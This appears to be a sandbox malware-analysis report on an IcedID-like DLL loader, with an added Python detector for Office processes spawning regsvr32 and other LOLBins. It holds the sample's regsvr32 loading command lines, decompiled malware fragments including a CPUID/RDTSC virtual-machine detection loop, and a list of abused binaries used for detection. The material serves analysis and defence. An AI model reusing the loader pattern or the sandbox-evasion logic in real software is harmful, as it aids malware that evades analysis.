                                                                                                                                                                                                                                Commandline:regsvr32 -silent ..\XZIBIT.dll
                                                                                                                                                                                                                                Imagebase:0xff7d0000
                                                                                                                                                                                                                                File size:19456 bytes
                                                                                                                                                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high
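The process list above shows a chain worth alerting on independently of any IcedID-specific signature: EXCEL.EXE, started with `/automation -Embedding`, spawns three `regsvr32 -silent` instances within seconds, each handed a relative DLL path (`..\XRAY.dll`, `..\XTOWN.dll`, `..\XZIBIT.dll`) rather than a DLL under C:\Windows or C:\Program Files. The Python below is an added example and not part of the Joe Sandbox report. It runs two independent checks over constructed Sysmon-style process-creation events (an Office host as direct parent of a living-off-the-land binary; regsvr32 registering a DLL from a relative or untrusted location) and returns which checks fired per event. The field names follow Sysmon Event ID 1, the sample events are constructed (the first three mirror the report's process list), and the trusted-root list is a deliberately small placeholder to be tuned per estate.

```python
"""Triage process-creation events for the Office -> regsvr32 chain shown in the report."""
import re
from pathlib import PureWindowsPath

# Office hosts that should not normally spawn script hosts or COM-registration utilities.
OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
# Signed Windows binaries commonly abused to run attacker-supplied code.
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe"}
# Roots from which a DLL handed to regsvr32 is considered expected (assumption: minimal list, tune it).
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files")


def image_name(path: str) -> str:
    """Basename of a Windows image path, lower-cased for comparison."""
    return PureWindowsPath(path).name.lower()


def office_spawned_lolbin(ev: dict) -> bool:
    """Check 1: an Office process is the direct parent of a LOLBin."""
    return image_name(ev["ParentImage"]) in OFFICE_IMAGES and image_name(ev["Image"]) in LOLBINS


def regsvr32_dll_arguments(cmdline: str) -> list:
    """Positional (non-switch) arguments of a regsvr32 command line, quotes stripped."""
    tokens = re.findall(r'"[^"]+"|\S+', cmdline)[1:]  # drop the program name itself
    return [t.strip('"') for t in tokens if not t.startswith(("-", "/"))]


def regsvr32_untrusted_dll(ev: dict) -> bool:
    """Check 2: regsvr32 given a relative path, or an absolute path outside TRUSTED_ROOTS."""
    if image_name(ev["Image"]) != "regsvr32.exe":
        return False
    for arg in regsvr32_dll_arguments(ev["CommandLine"]):
        p = PureWindowsPath(arg)
        # '..\XRAY.dll' is relative: it resolves against the parent's working directory,
        # i.e. wherever Excel opened the document, which is what the dropper relies on.
        if not p.is_absolute():
            return True
        if not str(p).lower().startswith(TRUSTED_ROOTS):
            return True
    return False


def triage(events: list) -> list:
    """Return (CommandLine, [reasons]) for every event that trips at least one check."""
    hits = []
    for ev in events:
        reasons = []
        if office_spawned_lolbin(ev):
            reasons.append("office-parent-lolbin")
        if regsvr32_untrusted_dll(ev):
            reasons.append("regsvr32-untrusted-dll")
        if reasons:
            hits.append((ev["CommandLine"], reasons))
    return hits


# Constructed events using Sysmon Event ID 1 field names; the first three mirror the report's process list.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\System32\regsvr32.exe", "CommandLine": r"regsvr32 -silent ..\XRAY.dll"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\System32\regsvr32.exe", "CommandLine": r"regsvr32 -silent ..\XTOWN.dll"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\System32\regsvr32.exe", "CommandLine": r"regsvr32 -silent ..\XZIBIT.dll"},
    # benign: re-registering a system DLL from an absolute, trusted path
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe", "CommandLine": r"regsvr32 /s C:\Windows\System32\msxml3.dll"},
    # trips check 2 only: no Office parent, but the DLL sits in the user's temp directory
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32 /s "C:\Users\bob\AppData\Local\Temp\upd.dll"'},
]

if __name__ == "__main__":
    for cmd, why in triage(SAMPLE_EVENTS):
        print(f"{', '.join(why):45} {cmd}")
```

Keeping the two checks separate matters for tuning: the Office-parent rule is high-confidence but narrow, while the untrusted-DLL rule catches the same loader when it is launched by some other parent, at the cost of needing an allow-list for legitimate installers.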

                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                Code Analysis


                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  C-Code - Quality: 25%
                                                                                                                                                                                                                                  			E020027BC(long long __rbx, void* __rcx, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                                                                                                                                                  				void* __rdi;
                                                                                                                                                                                                                                  				int _t23;
                                                                                                                                                                                                                                  				void* _t24;
                                                                                                                                                                                                                                  				void* _t27;
                                                                                                                                                                                                                                  				intOrPtr _t35;
                                                                                                                                                                                                                                  				void* _t36;
                                                                                                                                                                                                                                  				intOrPtr* _t44;
                                                                                                                                                                                                                                  				long long _t46;
                                                                                                                                                                                                                                  				intOrPtr* _t48;
                                                                                                                                                                                                                                  				intOrPtr* _t54;
                                                                                                                                                                                                                                  				intOrPtr* _t62;
                                                                                                                                                                                                                                  				signed long long _t64;
                                                                                                                                                                                                                                  				long long* _t67;
                                                                                                                                                                                                                                  				intOrPtr* _t69;
                                                                                                                                                                                                                                  				void* _t77;
                                                                                                                                                                                                                                  				void* _t78;
                                                                                                                                                                                                                                  				struct HINSTANCE__* _t79;
                                                                                                                                                                                                                                  				void* _t80;
                                                                                                                                                                                                                                  				CHAR* _t82;
                                                                                                                                                                                                                                  				char* _t83;
                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                  				_t64 = __rsi;
                                                                                                                                                                                                                                  				_t46 = __rbx;
                                                                                                                                                                                                                                  				_t44 = _t69;
                                                                                                                                                                                                                                  				 *((long long*)(_t44 + 8)) = __rbx;
                                                                                                                                                                                                                                  				 *((long long*)(_t44 + 0x18)) = __rbp;
                                                                                                                                                                                                                                  				 *((long long*)(_t44 + 0x20)) = __rsi;
                                                                                                                                                                                                                                  				_push(_t62);
                                                                                                                                                                                                                                  				_t80 = __rcx;
                                                                                                                                                                                                                                  				_t83 = L"; _gid=";
                                                                                                                                                                                                                                  				 *(_t44 + 0x10) =  *(_t44 + 0x10) & 0;
                                                                                                                                                                                                                                  				LoadLibraryA(_t82);
                                                                                                                                                                                                                                  				GetProcAddress(_t79);
                                                                                                                                                                                                                                  				_t67 = _t44;
                                                                                                                                                                                                                                  				if(_t44 == 0) {
                                                                                                                                                                                                                                  					L6:
                                                                                                                                                                                                                                  					r9d = 1;
                                                                                                                                                                                                                                  					_t23 = E02002990(_t36, _t44, _t46, _t80, L"; _gid=", _t62, 0x20070c4, _t77, _t78);
                                                                                                                                                                                                                                  					L7:
                                                                                                                                                                                                                                  					return _t23;
                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                  				_t24 =  *_t67(); // executed
                                                                                                                                                                                                                                  				if(_t24 == 0x6f && __rbx != 0) {
                                                                                                                                                                                                                                  					GetProcessHeap();
                                                                                                                                                                                                                                  					_t9 = _t64 + 8; // 0x8
                                                                                                                                                                                                                                  					_t36 = _t9;
                                                                                                                                                                                                                                  					HeapAlloc(??, ??, ??);
                                                                                                                                                                                                                                  					_t62 = _t44;
                                                                                                                                                                                                                                  					if(_t44 == 0) {
                                                                                                                                                                                                                                  						goto L6;
                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                  					_t54 = _t44; // executed
                                                                                                                                                                                                                                  					_t27 =  *_t67(); // executed
                                                                                                                                                                                                                                  					if(_t27 == 0) {
            _t48 = _t62;
            do {
                if( *((char*)(_t48 + 0x1c0)) != 0x30 ||  *((char*)(_t48 + 0x1c1)) != 0x2e) {
                    _t35 =  *((intOrPtr*)(_t48 + 0x194));
                    if(_t54 - 1 <= 7) {
                        r9d = _t35;
                        _t18 = _t48 + 0x198; // 0x198
                        _t54 = _t80 + _t64 * 2;
                        E02002990(_t36, _t44, _t48, _t54, _t83, _t62, _t18, _t77, _t78);
                        _t64 = _t64 + _t44;
                        _t83 = ":";
                    }
                }
                _t48 =  *_t48;
            } while (_t48 != 0);
            GetProcessHeap();
            _t36 = 0;
            _t23 = HeapFree(??, ??, ??);
            if(_t64 == 0) {
                goto L6;
            }
            goto L7;
        }
        GetProcessHeap();
        _t36 = 0;
        HeapFree(??, ??, ??);
    }
}

APIs
• GetAdaptersInfo.IPHLPAPI(?,?,00000000,02002CFE,?,?,00000003,020024A4), ref: 0200280F
• GetAdaptersInfo.IPHLPAPI(?,?,00000000,02002CFE,?,?,00000003,020024A4), ref: 02002845
Memory Dump Source
• Source File: 00000004.00000002.2097288821.0000000002000000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
Similarity
• API ID: AdaptersInfo
• String ID:
• API String ID: 3177971545-0
• Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
• Instruction ID: 98ca419b1e88d683ec6cf79219cfb0a1de14be62befbd33b379d7ba4c51b2a56
• Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
• Instruction Fuzzy Hash: 9331B035602B8099FB16DB61E888B99B7A0FB45F94F488125CF0D07BA5EF38C189C304
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2097288821.0000000002000000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
• Instruction ID: 7129f343dafa4689e080d4917027e595edc33761c9afacdcb01e5db724882af4
• Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
• Instruction Fuzzy Hash: 7E71CD32300B8187FB65CF66E884BA977A1FB89B98F448125DF4A53B94DF38C555C710
Uniqueness

Uniqueness Score: -1.00%

APIs
• LookupAccountNameW.ADVAPI32 ref: 0200233C
Memory Dump Source
• Source File: 00000004.00000002.2097288821.0000000002000000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
Similarity
• API ID: AccountLookupName
• String ID:
• API String ID: 1484870144-0
• Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
• Instruction ID: f1f3afddf0afe6eda9b1ddb1395c0ac8c4cd104a0ceb1eed8e77074b937c024b
• Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
• Instruction Fuzzy Hash: AB316762701B418AFB159FB4E8C879933E4EB48B88F588136DE4D57A69EF38C148D340
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtQuerySystemInformation.NTDLL(?,?,00000000,02002CB1,?,?,00000003,020024A4), ref: 020016CB
Memory Dump Source
• Source File: 00000004.00000002.2097288821.0000000002000000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
Similarity
• API ID: InformationQuerySystem
• String ID:
• API String ID: 3562636166-0
• Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
• Instruction ID: 9eb112d38068bcfb26e296b5316e57cab4475779ebb4e3b0002cda8666e55288
• Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
• Instruction Fuzzy Hash: A0218E35315B4083FB569B96A8C8769A2B2FB89BC5F084034EF0E57795EF3CE5459700
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  C-Code - Quality: 58%
			E02002434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
				void* __rbp;
				void* _t27;
				void* _t40;
				void* _t41;
				signed long long _t51;
				signed long long _t52;
				signed long long _t64;
				long long _t69;
				void* _t73;
				void* _t75;
				void* _t82;

				_t82 = __r9;
				_t71 = __rsi;
				_t69 = __rdi;
				_t64 = __rdx;
				_t52 = __rbx;
				_t51 = __rax;
				 *((long long*)(_t75 + 0x18)) = __rbx;
				 *((long long*)(_t75 + 0x20)) = __rdi;
				_t73 = _t75 - 0x57;
				_t4 = _t52 + 4; // 0x4
				_t40 = _t4;
				goto L1;
				L9:
				return 0;
				L1:
				asm("rdtsc");
				_t64 = _t64 << 0x20;
				_t51 = _t51 | _t64;
				_t52 = _t52 << 0x00000010 | __rcx;
				SleepEx(??, ??); // executed
				_t69 = _t69 - 1;
				if(_t69 != 0) {
					goto L1;
				} else {
					wsprintfA();
					E020011FC(_t73 - 0x29, _t52);
					_t37 = E0200153C(_t73 - 0x29);
					E02002C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
					_t44 = _t51;
					if(_t51 != 0) {
						_t80 = _t73 + 0x67;
						if(E02001EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
								_t27 = E0200272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
								_t55 =  *((intOrPtr*)(_t73 + 0x67));
								_t41 = _t27;
								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
									GetProcessHeap();
									HeapFree(??, ??, ??);
								}
								E02001FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
								_t49 = _t51;
								if(_t51 != 0) {
									E02002A1C(_t49, _t73 + 0x1b, _t51);
								}
							}
						}
					}
					goto L9;
				}
			}

APIs
Memory Dump Source
• Source File: 00000004.00000002.2097288821.0000000002000000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
• Instruction ID: 0ec82fd1bb530b202c21aab3a6f619dce6182b26ba4183c08a57e6317900e4cd
• Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
• Instruction Fuzzy Hash: A221AF32300B408AFB50DFB1E8D87ED63A2E748788F484426DE4D57698EF38D509D750
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2100723356.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
• Associated: 00000004.00000002.2100717819.000007FEF8FB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100730887.000007FEF8FB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100738731.000007FEF8FBE000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100744083.000007FEF8FC0000.00000002.00020000.sdmp
Similarity
• API ID: AllocVirtual
• String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
• API String ID: 4275171209-1517691801
• Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
• Instruction ID: ca2938b5bc2ab7f46aca023ee6394d65c54054d49ca74a4c487f6248e662f014
• Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
• Instruction Fuzzy Hash: 0451E0B251D6C5CAE3A18B28B49479BBFA0F386358F105128E6CD4BBA9C37DC518CF44
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2100723356.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
• Associated: 00000004.00000002.2100717819.000007FEF8FB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100730887.000007FEF8FB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100738731.000007FEF8FBE000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100744083.000007FEF8FC0000.00000002.00020000.sdmp
Similarity
• API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
• String ID: DllRegisterServer$G$_
• API String ID: 1174013218-1650116920
• Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
• Instruction ID: 3f6dfe96583287e2132e89248d3fe6d141595118fd8055dab05f5fe12df3ddc3
• Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
• Instruction Fuzzy Hash: 30310772908B868AE7A4CF25F84435AB7E1F7893A4F504039E68C97B78DB3DD1448F40
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2100723356.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
• Associated: 00000004.00000002.2100717819.000007FEF8FB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100730887.000007FEF8FB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100738731.000007FEF8FBE000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100744083.000007FEF8FC0000.00000002.00020000.sdmp
Similarity
• API ID: AllocVirtual
• String ID: @
• API String ID: 4275171209-2766056989
• Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
• Instruction ID: 93e7fb77665375a9f577d392b660a0ccbaf77ebf490505a570474afec7383057
• Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
• Instruction Fuzzy Hash: 62326C76609BC58AD7B5CB56F49079AB7A5F789B90F10802AEACC93B18DB3CC154CF01
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2097288821.0000000002000000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
Similarity
• API ID: ExitProcessSleepUser
• String ID:
• API String ID: 354099737-0
• Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
• Instruction ID: d86b8d21c6e58c131ad44e2c24205eb6690fd7b0c20af583202d53292cc0b59c
• Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
• Instruction Fuzzy Hash: E4C08C30508380C2F35E6760E8CCF2C6274A300309F00061DC34B256E18F7C10C8C707
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2100723356.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
• Associated: 00000004.00000002.2100717819.000007FEF8FB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100730887.000007FEF8FB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100738731.000007FEF8FBE000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100744083.000007FEF8FC0000.00000002.00020000.sdmp
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
• Instruction ID: 9dbeb4177cc0291c960bbfa91b59b6af253aaf81e4de24522d48fd320fe39546
• Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
• Instruction Fuzzy Hash: 49D13F76509BC586D764CB59F49039AB7A1F3C9790F10802AEBCD93B68DF79C4948F40
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,02001E13), ref: 0200264B
Memory Dump Source
• Source File: 00000004.00000002.2097288821.0000000002000000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
Similarity
• API ID: InfoNativeSystem
• String ID:
• API String ID: 1721193555-0
• Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
• Instruction ID: 7c1d85716f5b47643ce133dea38a29a0786cb7c65ab309fbe7e592bf72e79a25
• Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
• Instruction Fuzzy Hash: 79E09222720741C2FF25EB20E8D87993361FB84704F844222894E026B0EF3CD65DCB00
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2097288821.0000000002000000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
• Instruction ID: cf0aaa59f325d145bf76a392495013d17d369eab9c21a45aacb70c11f66a6ba3
• Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
• Instruction Fuzzy Hash: 9AD0A772E1034083F7309710EA9A7996351F394315F808206C58D44554CF7CC158C604
Uniqueness
Uniqueness Score: -1.00%

Non-executed Functions

                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2100723356.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100717819.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100730887.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100738731.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100744083.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: %
                                                                                                                                                                                                                                  • API String ID: 0-2567322570
                                                                                                                                                                                                                                  • Opcode ID: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                                                  • Instruction ID: ab3488ce0eceea3ee0bc7ce3bd4693e277bc5914e51a9d1bbe048e8b25635434
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E42A0B6A0C7D58AD7B08F15E0503ABBBE1F789744F10512AEAC986B59EB3CC480DF11
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2100723356.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100717819.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100730887.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100738731.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2100744083.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                                                  • Instruction ID: eaee352713882f45d60a20d6ad9de963d35200938772eb6fe9546e390b03a86b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4AC1A977A18BC586D760CF1AE44179ABBA4F3987D0F00852AEA9D83B69DB7CC450CF50
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  C-Code - Quality: 74%
/* Decompiler output from the sandbox (quality 74%, register tracking is lossy).
   Comments added to describe the RDTSC/CPUID timing loop that the report flags as
   "Contains functionality to detect hardware virtualization (CPUID execution measurement)". */
E02001E50(intOrPtr __ebx, intOrPtr __edx, signed long long __rax, long long __rbx, signed long long __rdx, signed long long __rsi) {
    signed int _t18;
    signed long long _t31;
    signed long long _t34;
    signed long long _t41;
    signed long long _t42;
    signed long long _t43;
    signed long long _t44;
    void* _t45;
    signed long long _t47;
    long long _t49;
    void* _t51;
    void* _t52;

    _t47 = __rsi;
    _t41 = __rdx;
    _t31 = __rax;
    *((long long*)(_t51 + 8)) = __rbx;        /* save non-volatile registers in the home space */
    *((long long*)(_t51 + 0x10)) = _t49;
    *((long long*)(_t51 + 0x18)) = __rsi;
    _push(_t45);
    _t52 = _t51 - 0x30;                       /* local buffer for the CPUID output */
    do {
        SwitchToThread();                     /* yield first so the sample starts on a fresh quantum */
        asm("rdtsc");                         /* timestamp before CPUID */
        _t42 = _t41 << 0x20;                  /* high half (EDX) of the timestamp shifted into place */
        asm("cpuid");                         /* CPUID traps to the hypervisor on most VMs, so it costs far more cycles there */
        *((intOrPtr*)(_t52 + 0x20)) = 1;
        *((intOrPtr*)(_t52 + 0x24)) = __ebx;  /* CPUID output registers stored to the local buffer */
        *((intOrPtr*)(_t52 + 0x28)) = 0;
        *((intOrPtr*)(_t52 + 0x2c)) = __edx;
        asm("rdtsc");                         /* timestamp after CPUID */
        _t43 = _t42 << 0x20;
        _t34 = (_t31 | _t42 | _t43) - (_t31 | _t42);  /* elapsed cycles around CPUID */
        _t45 = _t45 + _t34;                   /* accumulate the CPUID cost */
        _t18 = SwitchToThread();
        asm("rdtsc");                         /* second pair: two back-to-back RDTSCs as the baseline */
        _t44 = _t43 << 0x20;
        asm("rdtsc");
        _t41 = _t44 << 0x20;
        _t31 = (_t34 | _t44 | _t41) - (_t34 | _t44);  /* elapsed cycles with no CPUID in between */
        _t47 = _t47 + _t31;                   /* accumulate the baseline cost */
        _t49 = _t49 - 1;                      /* caller-supplied iteration count */
    } while (_t49 != 0);
    return _t18 / _t47;                       /* as decompiled; the real ratio is CPUID total / baseline total */
}

Instruction addresses (disassembly column, one per decompiled statement): 0x02001e50 0x02001e50 0x02001e50 0x02001e50 0x02001e55 0x02001e5a 0x02001e5f 0x02001e60 0x02001e6b 0x02001e6b 0x02001e71 0x02001e73 0x02001e84 0x02001e86 0x02001e8a 0x02001e8e 0x02001e92 0x02001e96 0x02001e98 0x02001e9f 0x02001ea2 0x02001ea5 0x02001eab 0x02001ead 0x02001eb8 0x02001eba 0x02001ec1 0x02001ec4 0x02001ec7 0x02001ec7 0x02001ee9

Memory Dump Source
• Source File: 00000004.00000002.2097288821.0000000002000000.00000040.00000001.sdmp, Offset: 02000000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
• Instruction ID: ee773c329dca8cb950fe41a0ed50da33fa87c29bc910b354af3ba42b0bbf4759
• Opcode Fuzzy Hash: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
• Instruction Fuzzy Hash: 44019E72B24B908AEF648B26B644349B6A2E38D7C0F148535EB9C43B19DA3CD0958B04
Uniqueness

Uniqueness Score: -1.00%
